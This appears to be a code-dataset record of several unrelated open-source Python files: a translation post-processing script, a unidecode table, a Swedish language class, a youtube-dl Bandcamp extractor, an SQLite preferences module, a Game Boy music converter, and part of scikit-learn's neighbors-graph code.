translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# write fixed-up tree
# if diff reduction was requested, rewrite some of the XML to 'sanitize' it toward Qt's formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
|
AwesomeTurtle/personfinder
|
refs/heads/master
|
app/vendors/unidecode/x07b.py
|
252
|
data = (
'Mang ', # 0x00
'Zhu ', # 0x01
'Utsubo ', # 0x02
'Du ', # 0x03
'Ji ', # 0x04
'Xiao ', # 0x05
'Ba ', # 0x06
'Suan ', # 0x07
'Ji ', # 0x08
'Zhen ', # 0x09
'Zhao ', # 0x0a
'Sun ', # 0x0b
'Ya ', # 0x0c
'Zhui ', # 0x0d
'Yuan ', # 0x0e
'Hu ', # 0x0f
'Gang ', # 0x10
'Xiao ', # 0x11
'Cen ', # 0x12
'Pi ', # 0x13
'Bi ', # 0x14
'Jian ', # 0x15
'Yi ', # 0x16
'Dong ', # 0x17
'Shan ', # 0x18
'Sheng ', # 0x19
'Xia ', # 0x1a
'Di ', # 0x1b
'Zhu ', # 0x1c
'Na ', # 0x1d
'Chi ', # 0x1e
'Gu ', # 0x1f
'Li ', # 0x20
'Qie ', # 0x21
'Min ', # 0x22
'Bao ', # 0x23
'Tiao ', # 0x24
'Si ', # 0x25
'Fu ', # 0x26
'Ce ', # 0x27
'Ben ', # 0x28
'Pei ', # 0x29
'Da ', # 0x2a
'Zi ', # 0x2b
'Di ', # 0x2c
'Ling ', # 0x2d
'Ze ', # 0x2e
'Nu ', # 0x2f
'Fu ', # 0x30
'Gou ', # 0x31
'Fan ', # 0x32
'Jia ', # 0x33
'Ge ', # 0x34
'Fan ', # 0x35
'Shi ', # 0x36
'Mao ', # 0x37
'Po ', # 0x38
'Sey ', # 0x39
'Jian ', # 0x3a
'Qiong ', # 0x3b
'Long ', # 0x3c
'Souke ', # 0x3d
'Bian ', # 0x3e
'Luo ', # 0x3f
'Gui ', # 0x40
'Qu ', # 0x41
'Chi ', # 0x42
'Yin ', # 0x43
'Yao ', # 0x44
'Xian ', # 0x45
'Bi ', # 0x46
'Qiong ', # 0x47
'Gua ', # 0x48
'Deng ', # 0x49
'Jiao ', # 0x4a
'Jin ', # 0x4b
'Quan ', # 0x4c
'Sun ', # 0x4d
'Ru ', # 0x4e
'Fa ', # 0x4f
'Kuang ', # 0x50
'Zhu ', # 0x51
'Tong ', # 0x52
'Ji ', # 0x53
'Da ', # 0x54
'Xing ', # 0x55
'Ce ', # 0x56
'Zhong ', # 0x57
'Kou ', # 0x58
'Lai ', # 0x59
'Bi ', # 0x5a
'Shai ', # 0x5b
'Dang ', # 0x5c
'Zheng ', # 0x5d
'Ce ', # 0x5e
'Fu ', # 0x5f
'Yun ', # 0x60
'Tu ', # 0x61
'Pa ', # 0x62
'Li ', # 0x63
'Lang ', # 0x64
'Ju ', # 0x65
'Guan ', # 0x66
'Jian ', # 0x67
'Han ', # 0x68
'Tong ', # 0x69
'Xia ', # 0x6a
'Zhi ', # 0x6b
'Cheng ', # 0x6c
'Suan ', # 0x6d
'Shi ', # 0x6e
'Zhu ', # 0x6f
'Zuo ', # 0x70
'Xiao ', # 0x71
'Shao ', # 0x72
'Ting ', # 0x73
'Ce ', # 0x74
'Yan ', # 0x75
'Gao ', # 0x76
'Kuai ', # 0x77
'Gan ', # 0x78
'Chou ', # 0x79
'Kago ', # 0x7a
'Gang ', # 0x7b
'Yun ', # 0x7c
'O ', # 0x7d
'Qian ', # 0x7e
'Xiao ', # 0x7f
'Jian ', # 0x80
'Pu ', # 0x81
'Lai ', # 0x82
'Zou ', # 0x83
'Bi ', # 0x84
'Bi ', # 0x85
'Bi ', # 0x86
'Ge ', # 0x87
'Chi ', # 0x88
'Guai ', # 0x89
'Yu ', # 0x8a
'Jian ', # 0x8b
'Zhao ', # 0x8c
'Gu ', # 0x8d
'Chi ', # 0x8e
'Zheng ', # 0x8f
'Jing ', # 0x90
'Sha ', # 0x91
'Zhou ', # 0x92
'Lu ', # 0x93
'Bo ', # 0x94
'Ji ', # 0x95
'Lin ', # 0x96
'Suan ', # 0x97
'Jun ', # 0x98
'Fu ', # 0x99
'Zha ', # 0x9a
'Gu ', # 0x9b
'Kong ', # 0x9c
'Qian ', # 0x9d
'Quan ', # 0x9e
'Jun ', # 0x9f
'Chui ', # 0xa0
'Guan ', # 0xa1
'Yuan ', # 0xa2
'Ce ', # 0xa3
'Ju ', # 0xa4
'Bo ', # 0xa5
'Ze ', # 0xa6
'Qie ', # 0xa7
'Tuo ', # 0xa8
'Luo ', # 0xa9
'Dan ', # 0xaa
'Xiao ', # 0xab
'Ruo ', # 0xac
'Jian ', # 0xad
'Xuan ', # 0xae
'Bian ', # 0xaf
'Sun ', # 0xb0
'Xiang ', # 0xb1
'Xian ', # 0xb2
'Ping ', # 0xb3
'Zhen ', # 0xb4
'Sheng ', # 0xb5
'Hu ', # 0xb6
'Shi ', # 0xb7
'Zhu ', # 0xb8
'Yue ', # 0xb9
'Chun ', # 0xba
'Lu ', # 0xbb
'Wu ', # 0xbc
'Dong ', # 0xbd
'Xiao ', # 0xbe
'Ji ', # 0xbf
'Jie ', # 0xc0
'Huang ', # 0xc1
'Xing ', # 0xc2
'Mei ', # 0xc3
'Fan ', # 0xc4
'Chui ', # 0xc5
'Zhuan ', # 0xc6
'Pian ', # 0xc7
'Feng ', # 0xc8
'Zhu ', # 0xc9
'Hong ', # 0xca
'Qie ', # 0xcb
'Hou ', # 0xcc
'Qiu ', # 0xcd
'Miao ', # 0xce
'Qian ', # 0xcf
'[?] ', # 0xd0
'Kui ', # 0xd1
'Sik ', # 0xd2
'Lou ', # 0xd3
'Yun ', # 0xd4
'He ', # 0xd5
'Tang ', # 0xd6
'Yue ', # 0xd7
'Chou ', # 0xd8
'Gao ', # 0xd9
'Fei ', # 0xda
'Ruo ', # 0xdb
'Zheng ', # 0xdc
'Gou ', # 0xdd
'Nie ', # 0xde
'Qian ', # 0xdf
'Xiao ', # 0xe0
'Cuan ', # 0xe1
'Gong ', # 0xe2
'Pang ', # 0xe3
'Du ', # 0xe4
'Li ', # 0xe5
'Bi ', # 0xe6
'Zhuo ', # 0xe7
'Chu ', # 0xe8
'Shai ', # 0xe9
'Chi ', # 0xea
'Zhu ', # 0xeb
'Qiang ', # 0xec
'Long ', # 0xed
'Lan ', # 0xee
'Jian ', # 0xef
'Bu ', # 0xf0
'Li ', # 0xf1
'Hui ', # 0xf2
'Bi ', # 0xf3
'Di ', # 0xf4
'Cong ', # 0xf5
'Yan ', # 0xf6
'Peng ', # 0xf7
'Sen ', # 0xf8
'Zhuan ', # 0xf9
'Pai ', # 0xfa
'Piao ', # 0xfb
'Dou ', # 0xfc
'Yu ', # 0xfd
'Mie ', # 0xfe
'Zhuan ', # 0xff
)
|
whip112/Whip112
|
refs/heads/master
|
vendor/packages/translate/lang/sv.py
|
30
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Zuza Software Foundation
#
# This file is part of the Translate Toolkit.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module represents the the Swedish language.
.. seealso:: http://en.wikipedia.org/wiki/Swedish_language
"""
from translate.lang import common
class sv(common.Common):
"""This class represents Swedish."""
validaccel = u"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" + \
u"1234567890" + \
u"åäöÅÄÖ"
|
Dino0631/RedRain-Bot
|
refs/heads/develop
|
cogs/lib/youtube_dl/extractor/bandcamp.py
|
12
|
from __future__ import unicode_literals
import json
import random
import re
import time
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
float_or_none,
int_or_none,
KNOWN_EXTENSIONS,
parse_filesize,
unescapeHTML,
update_url_query,
unified_strdate,
)
class BandcampIE(InfoExtractor):
_VALID_URL = r'https?://.*?\.bandcamp\.com/track/(?P<title>[^/?#&]+)'
_TESTS = [{
'url': 'http://youtube-dl.bandcamp.com/track/youtube-dl-test-song',
'md5': 'c557841d5e50261777a6585648adf439',
'info_dict': {
'id': '1812978515',
'ext': 'mp3',
'title': "youtube-dl \"'/\\\u00e4\u21ad - youtube-dl test song \"'/\\\u00e4\u21ad",
'duration': 9.8485,
},
'_skip': 'There is a limit of 200 free downloads / month for the test song'
}, {
'url': 'http://benprunty.bandcamp.com/track/lanius-battle',
'md5': '0369ace6b939f0927e62c67a1a8d9fa7',
'info_dict': {
'id': '2650410135',
'ext': 'aiff',
'title': 'Ben Prunty - Lanius (Battle)',
'uploader': 'Ben Prunty',
},
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
title = mobj.group('title')
webpage = self._download_webpage(url, title)
thumbnail = self._html_search_meta('og:image', webpage, default=None)
m_download = re.search(r'freeDownloadPage: "(.*?)"', webpage)
if not m_download:
m_trackinfo = re.search(r'trackinfo: (.+),\s*?\n', webpage)
if m_trackinfo:
json_code = m_trackinfo.group(1)
data = json.loads(json_code)[0]
track_id = compat_str(data['id'])
if not data.get('file'):
raise ExtractorError('Not streamable', video_id=track_id, expected=True)
formats = []
for format_id, format_url in data['file'].items():
ext, abr_str = format_id.split('-', 1)
formats.append({
'format_id': format_id,
'url': self._proto_relative_url(format_url, 'http:'),
'ext': ext,
'vcodec': 'none',
'acodec': ext,
'abr': int_or_none(abr_str),
})
self._sort_formats(formats)
return {
'id': track_id,
'title': data['title'],
'thumbnail': thumbnail,
'formats': formats,
'duration': float_or_none(data.get('duration')),
}
else:
raise ExtractorError('No free songs found')
download_link = m_download.group(1)
video_id = self._search_regex(
r'(?ms)var TralbumData = .*?[{,]\s*id: (?P<id>\d+),?$',
webpage, 'video id')
download_webpage = self._download_webpage(
download_link, video_id, 'Downloading free downloads page')
blob = self._parse_json(
self._search_regex(
r'data-blob=(["\'])(?P<blob>{.+?})\1', download_webpage,
'blob', group='blob'),
video_id, transform_source=unescapeHTML)
info = blob['digital_items'][0]
downloads = info['downloads']
track = info['title']
artist = info.get('artist')
title = '%s - %s' % (artist, track) if artist else track
download_formats = {}
for f in blob['download_formats']:
name, ext = f.get('name'), f.get('file_extension')
if all(isinstance(x, compat_str) for x in (name, ext)):
download_formats[name] = ext.strip('.')
formats = []
for format_id, f in downloads.items():
format_url = f.get('url')
if not format_url:
continue
# Stat URL generation algorithm is reverse engineered from
# download_*_bundle_*.js
stat_url = update_url_query(
format_url.replace('/download/', '/statdownload/'), {
'.rand': int(time.time() * 1000 * random.random()),
})
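# For illustration (hypothetical URL): a format_url of
#   https://bandcamp.com/download/track?id=123
# becomes
#   https://bandcamp.com/statdownload/track?id=123&.rand=<int(time*1000*random)>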
format_id = f.get('encoding_name') or format_id
stat = self._download_json(
stat_url, video_id, 'Downloading %s JSON' % format_id,
transform_source=lambda s: s[s.index('{'):s.rindex('}') + 1],
fatal=False)
if not stat:
continue
retry_url = stat.get('retry_url')
if not isinstance(retry_url, compat_str):
continue
formats.append({
'url': self._proto_relative_url(retry_url, 'http:'),
'ext': download_formats.get(format_id),
'format_id': format_id,
'format_note': f.get('description'),
'filesize': parse_filesize(f.get('size_mb')),
'vcodec': 'none',
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'thumbnail': info.get('thumb_url') or thumbnail,
'uploader': info.get('artist'),
'artist': artist,
'track': track,
'formats': formats,
}
class BandcampAlbumIE(InfoExtractor):
IE_NAME = 'Bandcamp:album'
_VALID_URL = r'https?://(?:(?P<subdomain>[^.]+)\.)?bandcamp\.com(?:/album/(?P<album_id>[^/?#&]+))?'
_TESTS = [{
'url': 'http://blazo.bandcamp.com/album/jazz-format-mixtape-vol-1',
'playlist': [
{
'md5': '39bc1eded3476e927c724321ddf116cf',
'info_dict': {
'id': '1353101989',
'ext': 'mp3',
'title': 'Intro',
}
},
{
'md5': '1a2c32e2691474643e912cc6cd4bffaa',
'info_dict': {
'id': '38097443',
'ext': 'mp3',
'title': 'Kero One - Keep It Alive (Blazo remix)',
}
},
],
'info_dict': {
'title': 'Jazz Format Mixtape vol.1',
'id': 'jazz-format-mixtape-vol-1',
'uploader_id': 'blazo',
},
'params': {
'playlistend': 2
},
'skip': 'Bandcamp imposes download limits.'
}, {
'url': 'http://nightbringer.bandcamp.com/album/hierophany-of-the-open-grave',
'info_dict': {
'title': 'Hierophany of the Open Grave',
'uploader_id': 'nightbringer',
'id': 'hierophany-of-the-open-grave',
},
'playlist_mincount': 9,
}, {
'url': 'http://dotscale.bandcamp.com',
'info_dict': {
'title': 'Loom',
'id': 'dotscale',
'uploader_id': 'dotscale',
},
'playlist_mincount': 7,
}, {
# with escaped quote in title
'url': 'https://jstrecords.bandcamp.com/album/entropy-ep',
'info_dict': {
'title': '"Entropy" EP',
'uploader_id': 'jstrecords',
'id': 'entropy-ep',
},
'playlist_mincount': 3,
}, {
# not all tracks have songs
'url': 'https://insulters.bandcamp.com/album/we-are-the-plague',
'info_dict': {
'id': 'we-are-the-plague',
'title': 'WE ARE THE PLAGUE',
'uploader_id': 'insulters',
},
'playlist_count': 2,
}]
@classmethod
def suitable(cls, url):
return (False
if BandcampWeeklyIE.suitable(url) or BandcampIE.suitable(url)
else super(BandcampAlbumIE, cls).suitable(url))
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader_id = mobj.group('subdomain')
album_id = mobj.group('album_id')
playlist_id = album_id or uploader_id
webpage = self._download_webpage(url, playlist_id)
track_elements = re.findall(
r'(?s)<div[^>]*>(.*?<a[^>]+href="([^"]+?)"[^>]+itemprop="url"[^>]*>.*?)</div>', webpage)
if not track_elements:
raise ExtractorError('The page doesn\'t contain any tracks')
# Only tracks with duration info have songs
entries = [
self.url_result(compat_urlparse.urljoin(url, t_path), ie=BandcampIE.ie_key())
for elem_content, t_path in track_elements
if self._html_search_meta('duration', elem_content, default=None)]
title = self._html_search_regex(
r'album_title\s*:\s*"((?:\\.|[^"\\])+?)"',
webpage, 'title', fatal=False)
if title:
title = title.replace(r'\"', '"')
return {
'_type': 'playlist',
'uploader_id': uploader_id,
'id': playlist_id,
'title': title,
'entries': entries,
}
class BandcampWeeklyIE(InfoExtractor):
IE_NAME = 'Bandcamp:weekly'
_VALID_URL = r'https?://(?:www\.)?bandcamp\.com/?\?(?:.*?&)?show=(?P<id>\d+)'
_TESTS = [{
'url': 'https://bandcamp.com/?show=224',
'md5': 'b00df799c733cf7e0c567ed187dea0fd',
'info_dict': {
'id': '224',
'ext': 'opus',
'title': 'BC Weekly April 4th 2017 - Magic Moments',
'description': 'md5:5d48150916e8e02d030623a48512c874',
'duration': 5829.77,
'release_date': '20170404',
'series': 'Bandcamp Weekly',
'episode': 'Magic Moments',
'episode_number': 208,
'episode_id': '224',
}
}, {
'url': 'https://bandcamp.com/?blah/blah@&show=228',
'only_matching': True
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
blob = self._parse_json(
self._search_regex(
r'data-blob=(["\'])(?P<blob>{.+?})\1', webpage,
'blob', group='blob'),
video_id, transform_source=unescapeHTML)
show = blob['bcw_show']
# This is desired because any invalid show id redirects to `bandcamp.com`
# which happens to expose the latest Bandcamp Weekly episode.
show_id = int_or_none(show.get('show_id')) or int_or_none(video_id)
formats = []
for format_id, format_url in show['audio_stream'].items():
if not isinstance(format_url, compat_str):
continue
for known_ext in KNOWN_EXTENSIONS:
if known_ext in format_id:
ext = known_ext
break
else:
ext = None
formats.append({
'format_id': format_id,
'url': format_url,
'ext': ext,
'vcodec': 'none',
})
self._sort_formats(formats)
title = show.get('audio_title') or 'Bandcamp Weekly'
subtitle = show.get('subtitle')
if subtitle:
title += ' - %s' % subtitle
episode_number = None
seq = blob.get('bcw_seq')
if seq and isinstance(seq, list):
try:
episode_number = next(
int_or_none(e.get('episode_number'))
for e in seq
if isinstance(e, dict) and int_or_none(e.get('id')) == show_id)
except StopIteration:
pass
return {
'id': video_id,
'title': title,
'description': show.get('desc') or show.get('short_desc'),
'duration': float_or_none(show.get('audio_duration')),
'is_live': False,
'release_date': unified_strdate(show.get('published_date')),
'series': 'Bandcamp Weekly',
'episode': show.get('subtitle'),
'episode_number': episode_number,
'episode_id': compat_str(video_id),
'formats': formats
}
|
latusrepo/propmtime
|
refs/heads/master
|
propmtime/gui/preferences.py
|
2
|
import os
import datetime
from distutils.util import strtobool
import sqlalchemy
import sqlalchemy.orm
import sqlalchemy.ext.declarative
import sqlalchemy.exc
from balsa import get_logger
from propmtime import __application_name__, __version__, DB_EXTENSION, convert_to_bool
log = get_logger(__application_name__)
"""
Reads/writes to the preferences DB. All accesses to the DB are via this module.
"""
Base = sqlalchemy.ext.declarative.declarative_base()
PREFERENCES_FILE = 'preferences' + DB_EXTENSION
class KeyValueTable(Base):
__tablename__ = 'keyvalue'
key = sqlalchemy.Column(sqlalchemy.String(), primary_key=True)
value = sqlalchemy.Column(sqlalchemy.String())
datetime = sqlalchemy.Column(sqlalchemy.DateTime())
class PathsTable(Base):
__tablename__ = 'paths'
path = sqlalchemy.Column(sqlalchemy.String(), primary_key=True)
watched = sqlalchemy.Column(sqlalchemy.Boolean())
datetime = sqlalchemy.Column(sqlalchemy.DateTime())
class PropMTimePreferences:
def __init__(self, app_data_folder, init=False):
log.debug('Preferences __init__')
self._do_hidden_string = 'hidden'
self._do_system_string = 'system'
self._verbose_string = 'verbose'
self._background_monitor_string = 'monitor'
self._version_string = 'version' # this DB (not the overall app)
self.version = '0.0.2' # current version of the DB
created_db = False
if not app_data_folder:
log.error(app_data_folder)
raise RuntimeError
self.app_data_folder = app_data_folder
os.makedirs(self.app_data_folder, exist_ok=True)
self._db_path = os.path.abspath(os.path.join(self.app_data_folder, PREFERENCES_FILE))
self._sqlite_path = 'sqlite:///' + self._db_path
log.debug('preferences DB path : %s' % self._sqlite_path)
self._db_engine = sqlalchemy.create_engine(self._sqlite_path) # , echo=True)
if init and Base.metadata.tables is None:
# new DB
log.info('creating DB')
Base.metadata.create_all(self._db_engine)
created_db = True
# got an old version of the DB - initialize
if init and not created_db and self.get_version() != self.version:
log.warn('preferences DB - current version %s is incompatible with existing version %s - re-initializing' %
(self.version, self.get_version()))
Base.metadata.drop_all(self._db_engine)
Base.metadata.create_all(self._db_engine)
created_db = True
if created_db:
self.set_version(self.version)
log.debug('exiting Preferences __init__')
def get_db_path(self):
return self._sqlite_path
def _get_session(self):
return sqlalchemy.orm.sessionmaker(bind=self._db_engine)()
def _kv_set(self, key, value):
log.debug('pref_set : %s to %s' % (str(key), str(value)))
session = self._get_session()
kv_table = KeyValueTable(key=key, value=value, datetime=datetime.datetime.utcnow())
q = session.query(KeyValueTable).filter_by(key=key).first()
if q:
session.delete(q)
session.add(kv_table)
session.commit()
session.close()
log.debug('exiting pref_set')
def _kv_get(self, key):
value = None
session = self._get_session()
try:
row = session.query(KeyValueTable).filter_by(key=key).first()
except sqlalchemy.exc.OperationalError as e:
row = None
if row:
value = row.value
session.close()
log.debug('pref_get : %s = %s' % (str(key), str(value)))
return value
def set_version(self, value):
self._kv_set(self._version_string, value)
def get_version(self):
return self._kv_get(self._version_string)
def set_do_hidden(self, value):
assert(type(value) is bool)
self._kv_set(self._do_hidden_string, value)
def get_do_hidden(self):
return convert_to_bool(self._kv_get(self._do_hidden_string))
def set_do_system(self, value):
assert(type(value) is bool)
self._kv_set(self._do_system_string, convert_to_bool(value))
def get_do_system(self):
return convert_to_bool(self._kv_get(self._do_system_string))
def set_verbose(self, value):
assert(type(value) is bool)
self._kv_set(self._verbose_string, value)
def get_verbose(self):
return convert_to_bool(self._kv_get(self._verbose_string))
def add_path(self, path):
session = self._get_session()
session.add(PathsTable(path=path, watched=False, datetime=datetime.datetime.utcnow()))
session.commit()
session.close()
def remove_path(self, path):
session = self._get_session()
session.query(PathsTable).filter_by(path=path).delete()
session.commit()
session.close()
def get_all_paths(self):
session = self._get_session()
paths = {row.path: row.watched for row in session.query(PathsTable)}
session.close()
for path in paths:
log.debug('get_all_paths : %s' % path)
return paths
def set_path_watched(self, path, watched_value):
session = self._get_session()
session.query(PathsTable).filter_by(path=path).update({"watched": watched_value})
session.commit()
session.close()
def is_path_watched(self, path):
session = self._get_session()
watched = [row.watched for row in session.query(PathsTable).filter_by(path=path)]
if watched and len(watched) > 0:
# should only be one since only one row per path
return convert_to_bool(watched[0])
return False
def get_app_data_folder(self):
return self.app_data_folder
def init_preferences_db(app_data_folder):
# call this at the beginning of every program that uses this module
pref = PropMTimePreferences(app_data_folder, init=True)
log.info('%s version %s' % (__application_name__, __version__))
log.info('preferences DB version %s' % pref.get_version())
|
Ifiht/GBVideoPlayer
|
refs/heads/master
|
itt.py
|
3
|
import sys
music = open(sys.argv[1]).read().splitlines()
ticks = int(sys.argv[2])
ticks_per_line = float(ticks) / len(music)
MIDDLE_A = 440.0
SEMITONE = 2.0 ** (1/12.0)
MIDDLE_C = MIDDLE_A * SEMITONE ** 3
SLIDE_MAGIC = SEMITONE ** (1/8.0)
DRUMS = {
"C-503": "201F2177228B2380".decode("hex"),
"C-504": "203F218122312380".decode("hex"),
"C-505": "203F219222102380".decode("hex"),
"C-506": "203F217122002380".decode("hex"),
"C-507": "203F217122512380".decode("hex"),
"A-407": "203F217122412380".decode("hex"),
"C-508": "203F21F1226B2380".decode("hex"),
}
#203F2188226B2380 # Bass
#203F217122002380 # Close hat
#203F218122312380 # Snare
#203F219222102380 # Open hat
def note_to_frequency(note):
index = ["C-", "C#", "D-", "D#", "E-", "F-", "F#", "G-", "G#", "A-", "A#", "B-"].index(note[:2])
octave = int(note[2]) - 5
return MIDDLE_C * (SEMITONE ** index) * (2.0 ** octave)
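# Quick sanity check of the mapping above: note_to_frequency("A-4") is
# MIDDLE_C * SEMITONE**9 / 2, which works out to 440.0 Hz (concert A),
# up to floating-point rounding.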
pending_delay = 0
previous_frequencies = [None] * 3
for line in music:
instruments = line[1:].split("|")
# Instruments 1 & 2
for index, instrument in enumerate(instruments[0:2]):
note = instrument[0:3]
volume = instrument[6:8]
command = instrument[8]
command_value = instrument[9:11]
if note == "===":
volume = "00"
command = "."
note = "..."
elif note != "...":
if volume == "..":
volume = "64"
if volume != "..":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
volume = int(volume)
volume = int(round(volume / 64.0 * 0xF))
sys.stdout.write("\x12" if index == 0 else "\x17")
sys.stdout.write(chr(volume * 0x10))
if note != "...":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
frequency = note_to_frequency(note)
previous_frequencies[index] = frequency
gb_frequency = int(round(2048 - 131072/frequency))
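# (Assumption, based on standard Game Boy sound-hardware documentation: the
# square channels' 11-bit period register encodes f = 131072/(2048 - reg),
# hence reg = 2048 - 131072/f, which must stay below 2048.)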
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100) | 0x80)) # 80 = Init sound
if command == "F":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[index] *= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[index]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100)))
if command == "E":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[index] /= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[index]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100)))
# Instrument 3
note = instruments[2][0:3]
command = instruments[2][8]
command_value = instruments[2][9:11]
if note != "...":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
if note == "===":
sys.stdout.write("\x1A\x00") # Channel Off
else:
frequency = note_to_frequency(note)
previous_frequencies[2] = frequency
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
try:
sys.stdout.write("\x1A\x80") # Channel On
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100) | 0x80)) # 80 = Init sound
except:
sys.stderr.write(line+"\n")
if command == "F":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[2] *= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[2]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100)))
if command == "E":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[2] /= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[2]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100)))
pending_delay += ticks_per_line
# Instrument 4
sample = instruments[3][:5]
if sample in DRUMS:
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
sys.stdout.write(DRUMS[sample])
elif sample != ".....":
sys.stderr.write("Missing drum definition for %s. \n" % (sample,))
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
|
valexandersaulys/prudential_insurance_kaggle
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sklearn/neighbors/graph.py
|
208
|
"""Nearest Neighbors graph functions"""
# Author: Jake Vanderplas <vanderplas@astro.washington.edu>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import warnings
from .base import KNeighborsMixin, RadiusNeighborsMixin
from .unsupervised import NearestNeighbors
def _check_params(X, metric, p, metric_params):
"""Check the validity of the input parameters"""
params = zip(['metric', 'p', 'metric_params'],
[metric, p, metric_params])
est_params = X.get_params()
for param_name, func_param in params:
if func_param != est_params[param_name]:
raise ValueError(
"Got %s for %s, while the estimator has %s for "
"the same parameter." % (
func_param, param_name, est_params[param_name]))
def _query_include_self(X, include_self, mode):
"""Return the query based on include_self param"""
# Done to preserve backward compatibility.
if include_self is None:
if mode == "connectivity":
warnings.warn(
"The behavior of 'kneighbors_graph' when mode='connectivity' "
"will change in version 0.18. Presently, the nearest neighbor "
"of each sample is the sample itself. Beginning in version "
"0.18, the default behavior will be to exclude each sample "
"from being its own nearest neighbor. To maintain the current "
"behavior, set include_self=True.", DeprecationWarning)
include_self = True
else:
include_self = False
if include_self:
query = X._fit_X
else:
query = None
return query
def kneighbors_graph(X, n_neighbors, mode='connectivity', metric='minkowski',
p=2, metric_params=None, include_self=None):
"""Computes the (weighted) graph of k-Neighbors for points in X
Read more in the :ref:`User Guide <unsupervised_neighbors>`.
Parameters
----------
X : array-like or BallTree, shape = [n_samples, n_features]
Sample data, in the form of a numpy array or a precomputed
:class:`BallTree`.
n_neighbors : int
Number of neighbors for each sample.
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
metric : string, default 'minkowski'
The distance metric used to calculate the k-Neighbors for each sample
point. The DistanceMetric class gives a list of available metrics.
The default distance is 'euclidean' ('minkowski' metric with the p
param equal to 2.)
include_self: bool, default None
Whether or not to mark each sample as the first nearest neighbor to
itself. If `None`, then True is used for mode='connectivity' and False
for mode='distance' as this will preserve backwards compatibility. From
version 0.18, the default value will be False, irrespective of the
value of `mode`.
p : int, default 2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric_params: dict, optional
additional keyword arguments for the metric function.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
A[i, j] is assigned the weight of edge that connects i to j.
Examples
--------
